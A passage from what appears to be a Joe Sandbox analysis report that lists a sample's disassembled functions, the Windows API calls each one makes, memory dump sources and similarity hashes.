                                                                                                                                                    • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,02FB5FA0,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                                                    • API String ID: 3100379633-4164748364
                                                                                                                                                    • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                    • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                                                    • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                    • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                                                    Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                                                    • IsIconic.USER32(?), ref: 0043444F
                                                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                    • API String ID: 2889586943-2988720461
                                                                                                                                                    • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                    • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                                                    • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                    • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                                                                    Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                                                    • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                                                    • _wcslen.LIBCMT ref: 00446498
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                                                                    • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                                                    • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                                                    • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                                                                    • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                                                                    • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                                                                    • String ID: $@OH$default$winsta0
                                                                                                                                                    • API String ID: 3324942560-3791954436
                                                                                                                                                    • Opcode ID: 008551255289e0f64750cc90ca1d548d2031df532aac26d7c63e55199363bc36
                                                                                                                                                    • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                                                                    • Opcode Fuzzy Hash: 008551255289e0f64750cc90ca1d548d2031df532aac26d7c63e55199363bc36
                                                                                                                                                    • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                                                                    Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _wcslen.LIBCMT ref: 004096C1
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • _memmove.LIBCMT ref: 0040970C
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                                                                    • _memmove.LIBCMT ref: 00409D96
                                                                                                                                                    • _memmove.LIBCMT ref: 0040A6C4
                                                                                                                                                    • _memmove.LIBCMT ref: 004297E5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2383988440-0
                                                                                                                                                    • Opcode ID: 55a3c3eb22fc06341cb360cdc15f1a7bf5461d7a98e87c474a269a602399cf4a
                                                                                                                                                    • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                                                                    • Opcode Fuzzy Hash: 55a3c3eb22fc06341cb360cdc15f1a7bf5461d7a98e87c474a269a602399cf4a
                                                                                                                                                    • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                                                                                                    Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                                                                    • __swprintf.LIBCMT ref: 004789D3
                                                                                                                                                    • __swprintf.LIBCMT ref: 00478A1D
                                                                                                                                                    • __swprintf.LIBCMT ref: 00478A4B
                                                                                                                                                    • __swprintf.LIBCMT ref: 00478A79
                                                                                                                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                                                                      • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                                                                    • __swprintf.LIBCMT ref: 00478AA7
                                                                                                                                                    • __swprintf.LIBCMT ref: 00478AD5
                                                                                                                                                    • __swprintf.LIBCMT ref: 00478B03
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                    • API String ID: 999945258-2428617273
                                                                                                                                                    • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                                    • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                                                                    • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                                    • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                                                                    Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                    • _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                                    • _wcscat.LIBCMT ref: 004034BC
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                                                    • _wcscpy.LIBCMT ref: 004035A0
                                                                                                                                                    • _wcslen.LIBCMT ref: 00403623
                                                                                                                                                    • _wcslen.LIBCMT ref: 0040367D
                                                                                                                                                    Strings
                                                                                                                                                    • Unterminated string, xrefs: 00428348
                                                                                                                                                    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                                                    • Error opening the file, xrefs: 00428231
                                                                                                                                                    • _, xrefs: 0040371C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                                    • API String ID: 3393021363-188983378
                                                                                                                                                    • Opcode ID: b09ed5fe91e13c81baa094617643eef460dbacb947cc1a11d73a8daefe1aa9ab
                                                                                                                                                    • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                                                    • Opcode Fuzzy Hash: b09ed5fe91e13c81baa094617643eef460dbacb947cc1a11d73a8daefe1aa9ab
                                                                                                                                                    • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                                                                    Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                                    • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                                    • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                                                                    • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                                    • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                                                                    Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                                                                    • __swprintf.LIBCMT ref: 00431C2E
                                                                                                                                                    • _wcslen.LIBCMT ref: 00431C3A
                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                                    • API String ID: 2192556992-3457252023
                                                                                                                                                    • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                                    • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                                                                    • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                                    • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                                                                    Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                                                    • __swprintf.LIBCMT ref: 004722B9
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FolderPath$LocalTime__swprintf
                                                                                                                                                    • String ID: %.3d
                                                                                                                                                    • API String ID: 3337348382-986655627
                                                                                                                                                    • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                                    • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                                                                    • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                                    • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                                                                    Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
